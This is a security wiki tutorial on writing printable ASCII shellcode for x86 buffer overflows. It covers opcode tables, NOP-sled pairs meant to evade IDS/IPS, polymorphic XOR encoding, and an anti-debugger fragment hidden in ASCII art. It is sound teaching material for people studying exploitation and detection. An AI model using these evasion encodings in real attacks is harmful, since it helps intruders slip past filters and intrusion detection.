Questions about this topic? Sign up to ask in the talk tab.

Ascii shellcode

From NetSec
Revision as of 17:38, 5 April 2012 by LashawnSeccombe (Talk | contribs) (Implementation)

Jump to: navigation, search
c3el4.png Printable ascii shellcode is used to evade sanitizing on the network and software layers during buffer overflow exploitation.

Introduction

Ascii shellcode bypasses many character filters and is somewhat easy to learn due to the fact that many ascii instructions are only one or two byte instructions. The smaller the instructions, the more easily obfuscated and randomized they are. During many buffer overflows the buffer is limited to a very small writeable segment of memory, so many times it is important to utilize the smallest possible combination of opcodes. In other cases, more buffer space is available and things like ascii art shellcode are more plausible.

Available Instructions

Protip: The printable ascii shellcode character space consists within 3 main ranges, while symbols exist between them:
  • Lowercase alpha falls between 0x61 and 0x7a (a-z).
  • Uppercase alpha falls between 0x41 and 0x5a (A-Z).
  • Numeric space falls between 0x30 and 0x39 (0-9).


ASCII Shellcode Table
ASCII Value Hex Opcode Assembly Equivalent
0 \x30 xor
1 \x31 xor
2 \x32 xor
3 \x33 xor
4 \x34 xor al, 0x## [byte]
5 \x35 xor eax, 0x######## [DWORD]
6 \x36 SS Segment Override
7 \x37 aaa
8 \x38 cmp
9 \x39 cmp
 : \x3a cmp
 ; \x3b cmp
< \x3c cmp al, 0x## [byte]
= \x3d cmp eax, 0x######## [DWORD]
> \x3e [undocced nop]
 ? \x3f aas
@ \x40 inc eax
A \x41 inc ecx
B \x42 inc edx
C \x43 inc ebx
D \x44 inc esp
E \x45 inc ebp
F \x46 inc esi
G \x47 inc edi
H \x48 dec eax
I \x49 dec ecx
J \x4a dec edx
K \x4b dec ebx
L \x4c dec esp
M \x4d dec ebp
N \x4e dec esi
O \x4f dec edi
P \x50 push eax
Q \x51 push ecx
R \x52 push edx
S \x53 push ebx
T \x54 push esp
U \x55 push ebp
V \x56 push esi
W \x57 push edi
X \x58 pop eax
Y \x59 pop ecx
Z \x5a pop edx
[ \x5b pop ebx
\ \x5c pop esp
] \x5d pop ebp
^ \x5e pop esi
_ \x5f pop edi
` \x60 pushad
a \x61 popad
b \x62 bound
c \x63 arpl
d \x64 FS Segment Override
e \x65 GS Segment Override
f \x66 16 Bit Operand Size
g \x67 16 Bit Address Size
h \x68 push 0x######## [dword]
i \x69 imul reg/mem with immediate to reg/mem
j \x6a push 0x## [byte]
k \x6b imul immediate with reg into reg
l \x6c insb es:[edi], [dx]
m \x6d insl es:[edi], [dx]
n \x6e outsb [dx], dx:[esi]
o \x6f outsl [dx], ds:[esi]
p \x70 jo 0x## [byte relative offset]
q \x71 jno 0x## [byte relative offset]
r \x72 jb 0x## [byte relative offset]
s \x73 jae 0x## [byte relative offset]
t \x74 je 0x## [byte relative offset]
u \x75 jne 0x## [byte relative offset]
v \x76 jbe 0x## [byte relative offset]
w \x77 ja 0x## [byte relative offset]
x \x78 js 0x## [byte relative offset]
y \x79 jns 0x## [byte relative offset]
z \x7a jp 0x## [byte relative offset]

Constructing your NOP Sled

Notice: Most modern day IPS systems are capable of recognizing ASCII NOP sleds due to their popularity in modern exploitation. Many IPS systems look for large strings of repeating characters. The solution to this problem is to make use of 'effective NOPs', instead of simply NOPs. Combine this with a randomization sequence and one can avoid IPS detection in a few simple steps.

Instructions

ASCII NOP Pairs (Figure 1)
ASCII Pair Hex Opcode Register Instructions Used Commonly Detected
AI \x41\x49  %ecx INC, DEC No
@H \x40\x48  %eax INC, DEC Yes
BJ \x42\x4A  %edx INC, DEC No
CK \x43\x4B  %ebx INC, DEC No
DL \x44\x4C  %esp INC, DEC No
EM \x45\x4D  %ebp INC, DEC No
FN \x46\x4E  %esi INC, DEC No
GO \x47\x4F  %edi INC, DEC No
The professor says
You can put the Pair in any order, e.g. AI, IA, @H, H@, as long as both characters are used the same number of times. You can even jumble them together. The above is only true when using INC and DEC NOPs exclusively.
ASCII NOP Pairs (Figure 2)
ASCII Pair Hex Opcode Register Instructions Used Commonly Detected
PX \x50\x58  %eax PUSH, POP No
QY \x51\x59  %ecx PUSH, POP No
RZ \x52\x5A  %edx PUSH, POP No
S[ \x53\x5B  %ebx PUSH, POP Yes
T\ \x54\x5C  %esp PUSH, POP Yes
U] \x55\x5D  %ebp PUSH, POP Yes
V^ \x56\x5E  %esi PUSH, POP Yes
W_ \x57\x5F  %edi PUSH, POP Yes
a` \x61\x60 ALL PUSH, POP Yes

Implementation

Notice: Proper combination of these instructions will work to evade repeating-character based IDS and IPS systems.

There are also other operations can be used as NOPs as well. Of course, these operations do actually do things. This doesn't matter a whole lot, because register values are preserved.

For example, '4' or 0x34 is:

<syntaxhighlight lang="asm">xor al, 0x??</syntaxhighlight>

On the other hand, '5', or 0x35, is:

<syntaxhighlight lang="asm">xor eax, 0x????</syntaxhighlight>

So, if P5LULZX were to execute, nothing would happen other than a waste of cpu cycles.. The Assembly looks like :

<syntaxhighlight lang="asm">

 [intel]				[att sysV]
 push eax			        pushl %eax
 xor eax, 0x4c554c5a		        xorl $0x4c554c5a, %eax
 pop eax				popl %eax

</syntaxhighlight>

The value of the %eax register is momentarily changed and then restored.. That's not really going to modify execution flow, save for cpu cycle count. There's more examples of this too, if the goal is only to create effective NOPs. For example, PhLULZX5LULZX, adds more bytes to the NOP sled:

<syntaxhighlight lang="asm">

 [intel]				[att sysV]
 push eax			        pushl %eax
 push 0x4c554c5a			pushl $0x4c554c5a
 pop eax				popl %eax
 xor eax, 0x4c554c5a		        xorl $0x4c554c5a, %eax
 pop eax				popl %eax

</syntaxhighlight>

PUSH/POPS can be mixed with INC/DEC operands without much difficulty. Once a register has been pushed to the stack, anything can be done to its value before popping that register back off the stack.

c3el4.png Even arithmetic calculations can be used as long as the original values of the registers are restored. This preserves the environment for the executing shellcode.

In this example using the PUSH and POP instructions, PRQXYZQPRXZY, the code simply re-arranges the register values and puts them back in the right place.

The assembly is as follows:

<syntaxhighlight lang="asm">

 [intel]				[att sysV]
 push eax			        pushl %eax
 push edx			        pushl %edx
 push ecx			        pushl %ecx
 pop eax				popl %eax
 pop ecx				popl %ecx
 pop edx				popl %edx
 push ecx			        pushl %ecx
 push eax			        pushl %eax
 push edx			        pushl %edx
 pop eax				popl %eax
 pop edx				popl %edx
 pop ecx				popl %ecx

</syntaxhighlight>

As far as the INC/DEC instructions are concerned, shellcode like ACBKJI leave the %ecx, %edx, and %ebx registers completely unchanged. Therefore any register can be incremented any number of times so long as the register is decremented the same amount.

Protip: INC and DEC use only half a cpu cycle or less depending on CPU architecture and are usually the highest performing instructions of those which are available. Using multiple combinations and implementations of this concept will yield a maximum IDS evasive effect.


Basic Encoding

Okay, so we see the ASCII instructions, but what can we do with them? It doesn't look like there are a lot of different instructions that are available, now does it? Using only ASCII, the smallest method to zero out the eax register is five bytes, jXX4X, examined below:

 Ascii	Machine Code	Assembly
 ----------------------------------------------
 jX	\x6a\x58	push byte 0x58
 X	\x58	        pop eax
 4X	\x34\x58	xor al, 58

If you look back to the explanation of the eax register, you'll see that the al register is the last Byte of eax. Lets look at that, line by line:

 Assembly	Action
 --------------------------------------------
 push 0x58	pushes 58000000 onto the stack
 pop eax	pops eax, sets eax to 0x00 00 00 58
 xor al, 58	because al = 58, al now = 00, making eax = 0x00000000

XOR can sometimes be a serious inconvenience to programmers, as it is not so much difficult as it is time consuming. The XOR instruction does a Bitwise Comparison on two values. XOR is also called the exclusive or instruction. Remember how we went back down to binary earlier? We're going have to do it again. If the bits are the same, then the corresponding or respective bit is reset to 0. If the two bits are different, then the corresponding or respective bit is set to 1. For example, F xor 3:

 1111 F xor
 0011 3 =
 ------------
 1100 C
c3el4.png Any time you XOR something with itself, it becomes zero.
 1111 F xor	1001 9 xor
 1111 F =	1001 9 =
 ----------	----------
 0000 0	0000 0

Right now, we are able to preform an ASCII-only XOR instruction on the al one Byte register. However, one Byte will not always be enough, will it? As we already know, we are able to PUSH registers, POP registers, PUSH DWORD values, and XOR them. Lets review some important instructions:

 Ascii	Hex	Assembly		Operand Size
 ------------------------------------------------------------------
 h	\x68	push 0x########		DWORD
 5	\x35	xor eax, 0x########	DWORD
 4	\x34	xor al, 0x##		BYTE
 X	\x58	pop eax	
 j	\x6a	push 0x##		BYTE
 Q	\x51	push ecx 	
 P	\x50	push eax 	
 Y	\x59	pop ecx	
 Z	\x5a	pop edx	

So, a small example of ASCII to modify the entire DWORD value of the eax register and set the register value to zero is hLULZX5LULZ:

 Ascii	   Machine Code           Assembly
 hLULZ	   \x68\x4c\x55\x4c\x5a	  push 0x5a4c554c
 X	   \x58                   pop eax
 5LULZ	   \x35\x4c\x55\x4c\x5a   xor eax, 0x5a4c554c


And now we have XORed out the eax DWORD in 11 bytes.

An introduction to Polymorphic Shellcode

Alright, so we want to clear out the eax register, set it to all NOPs (0x90) and push it onto the stack, using nothing but ASCII. We can't use the \x90 opcode, because the \x90 code does not live in the ASCII keyspace. So how do we go about this?

Polymorphic code refers to a piece of code's ability to change itself. Machine code can modify itself through any of the functions which allow modification of registers. Self-modifying code is generally used to prevent the reverse-engineer from understanding the code. This method of code obfuscation is quite common and is considered a standard in most targeted exploitations.

Polymorphic code is how we will push 0x90909090 onto the stack without referencing the actual value 0x90 a single time. In the shortest amount of bytes possible, the shellcode to do so is jFX4FH5ooooP (12 bytes), let's analyze that:

 Ascii	Machine Code	     Assembly
 jF	\x6a\x46             push 0x46
 X	\x58                 pop eax
 4F	\x34\x46             xor al, 0x46
 H	\x48                 dec eax
 5oooo	\x35\x6f\x6f\x6f\x6f xor eax, 0x6f6f6f6f
 P	\x50                 push eax

If you're still a little confused, lets break it down even further:

 Assembly	        Value of EAX Register
 push 0x46	
 pop eax               0x00000046
 xor al, 0x46          0x00000000
 dec eax               0xffffffff
 xor eax, 0x6f6f6f6f   0x90909090
 push eax

There are two things happening here which I have not yet covered thoroughly. The first one of these is the dec eax, or the \x48 instruction. Usually, dec simply decrements the affected register. However, when that register is already equal to 0x00000000, dec will go all the way back and set the register to 0xffffffff. The second thing is that XOR instruction. The XOR instruction in the above code does an exclusive or as follows:

 0xffffffff xor
 0x6f6f6f6f


And stores the value in eax, then PUSHes eax. Nybble by nybble, Byte by Byte following of the exclusive or instruction:

 1111	1111	1111	1111	1111	1111	1111	1111	(FFFFFFFF) xor
 0110	1111	0110	1111	0110	1111	0110	1111	(6F6F6F6F) =
 ----	----	----	----	----	----	----	----	--------------
 1001	0000	1001	0000	1001	0000	1001	0000	(90909090)

Polymorphic code should consist of methods which place a random or comment value into a register, and then XOR the register until the desired value has been reached. We can start the register value at any ASCII value, 0x00000000, or 0xffffffff, by XORing a register with itself, or by setting the register value to zero and then decrementing it.

Notice that this shellcode is 100% alphanumeric. There is of course, non-ASCII and non-alphanumeric polymorphic code, which has much less inhibitions than printable ASCII or alpha-numeric bytecode.

Without ASCII limitations, we have several instructions, or "modifiers" that we can use for our morphing. Generally, any instruction that can be used to modify the value of a register, in relation to itself (anything other than moving a value into a register) is considered a modifier. Modifiers, including ASCII modifiers, are as follows:

  • add
  • sub
  • dec
  • inc
  • xor
  • or
  • and
  • not
  • imul
  • idiv

Now, several of those instructions are considered Bitwise Operations. Bitwise operations refer to instructions that modify bits individually based on the result from the comparison of each bit in two separate hexadecimal values. The XOR instruction is a good example, which we have already covered. The OR instruction is the opposite of XOR. If the bits are the same, the corresponding bit is set to one. If the bits are different, the corresponding bit is set to zero. For example, 4 or E = 5:

 0100 4 or
 1110 E =
 ----------
 0101 5

A few rules for OR and XOR that will help us keep track of things:

  1. Any time you xor a value with itself the result is 0
  2. Any time you xor a value with zero the result is the original value
  3. Any time you or a value with F the result is the original value
  4. Any time you or a value with itself the result is F

We have defined our valid instructions and how they can be used to modify register values. But what can modifying a few register values do for us, even if we replace them with instruction code? The answer is simple; we push each Byte of our shellcode onto the stack in reverse order, and then we JMP to esp. We are executing in stack space, and we've constructed our code backwards at esp because the stack grows backwards. Now we jump to esp, where we suddenly find ourselves at our newly-constructed code.

Lets start by using our twelve-byte ASCII NOP-constructing code jFX4XH5oooP. We can actually leave that just the way it is because of the PUSH eax instruction at the end. Let's just add a JMP esp. You'll find that the app will execute the four NOPs before running itself into non-sensible instructions left on the stack as data. But wait! There's more!

What if we pushed the new code onto the stack backwards and then executed that? Holy hex! The code would construct its decryptor, decrypt the value 0x90909090, construct it onto the stack, and then execute the NOP sequence! Using this concept, we can actually construct and decrypt our code multiple times before the code is fully decrypted, constructed, or executed. This is done by manipulating the value of esp so that, as the values are pushed onto the stack, eventually esp runs into eip, and then executes in temporary execution and stack space.

The question is "When does this become overkill and preformance-sacrificing versus efficient and anti-heuristic?" Well, there are a few ways that we can manipulate the value of ESP. Just about any modifier is able to do so - however, to keep it mostly alphanumeric, we're gonna have a few limitations. Those limitations being that the value we assign to the esp register must be relative in order to make ourselves run into our own code. For example, the popad instruction (a or 0x61) pops all registers... So we've lost register data, but that's okay - we have now added 32 to the value of ESP. The pushad instruction will work similarly, subtracting 32 from the value of ESP. Eventually with enough tinkering, you should be able to figure out how to use instructions other than xor, including but not limited to ror, rol, shr, shl, add, sub, imul, idiv, and others.

Encoding Shellcode : Ascii Art

Jump restrictions are between 48 and 122

Lets start out with Koshi's 14 byte alphanumeric NtGlobalFlags Payload:

jpXV34dd3v09Fh je dubugger present (in alpha, 't(operand)').

we'll want to exit if there's a debugger present.

but lets get onto the real fun, shall we?

push 'p' #jp pop eax #X push esi #V xor esi, dword ptr ss:[esp] #34d (now contains esi), esi = 0 xor esi, dword ptr ss:[esi+30] #d3v0 (store offset 0x30 into esi) cmp dword ptr ds:[esi+68], eax #9Fh (compare esi pointer offset 0x68 with 0x70.)

So for our beginning notes, we can be assured that the following must be sequential, and registers must be preserved:

V34dd4v0 - ESI must be zeroed, NtGlobalflags must be stored in ESI. esi cannot be modified until eax is set to 0x6a/'j' and then 9Fh is run as a comparison.

So lets see here, our comparisons are a little hacky. We can compare eax to a dword using the '=' opcode 0x3a, after that we're limited to the unpredictable 0x38-0x3b instructions. So, for sanity sake, we'll use the '=' opcode here. Our other cmp operators will be reserved for future instructions, as they get a lot more complex.

So suppose we wanted to jump 30 bytes ahead in pure ascii. The easy way to do this is by setting the value of the eax register to a controllable ascii DWORD. In our case, we'll use the string 'code':

hcodeX=codet0

Disassembled, this represents: push 'code' pop  %eax cmp 'code', %eax je 0x30

Lets get ourselves some ascii art. This ascii art is 80 bytes wide, so each line is 81 bytes including the newline (0x0a).

                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo. 
                                                                     d"     YD 
                                                                     "Y88888P' 

Lets see which lines look the best for code insertion. The string 'hcodeX=codet0' is 13 bytes. We can start with a jump to the big string of o's at the top of the 'D' in Debug. The first 'o' is at row two, column 23. 81 + 23 = 104, or 0x68, the 'h' character:


hcodeX=codeth                                                                  
                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'

We have now jumped to the top of the D. So, going back to our shellcode, as long as we preserve eax, we can jump in the string '=codeth' which is 7 bytes, which lets us squeeze shellcode in spaces. Using our dword 'code' will actually let us tag our shellcode, serving as a tag on the next line in empty space. Because we can only jump 122 bytes, we can't get to a part of the ascii art with enough room. We can solve this problem by finding empty enough space to toss our jump code in, along with a little bit of the necessary shellcode:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d4v0=codet?        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'


We've actually gotten up to the ? mark, and all the way through the bit of code to store the PEB value into the %esi register using the string 'V34dd4v0' while maintaining our ability to jump around. Our next bit of code is going to be tricy. We'll have to jump 80 bytes to land at the top of our 'e'. From there we'll go to the lower top of the 'n', then to the middle of the 'e'. From there to the middle of the g to the bottom of the b, create an extra bottom on the D to accentuate, then jump to the bottom of the 'g' when we're finished. The end result, after calculating out the ascii looks like:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d4v0=codeti        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  =codet.   888oooo.  oooo  oooo   .oooooooo
`888codetn  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 88=codetk  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `=codet5' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `=codet0'  `V88V"V8P' `8oooooo. 
                     =codet|                                         d"     YD 
                                                                     "jpX9Fht?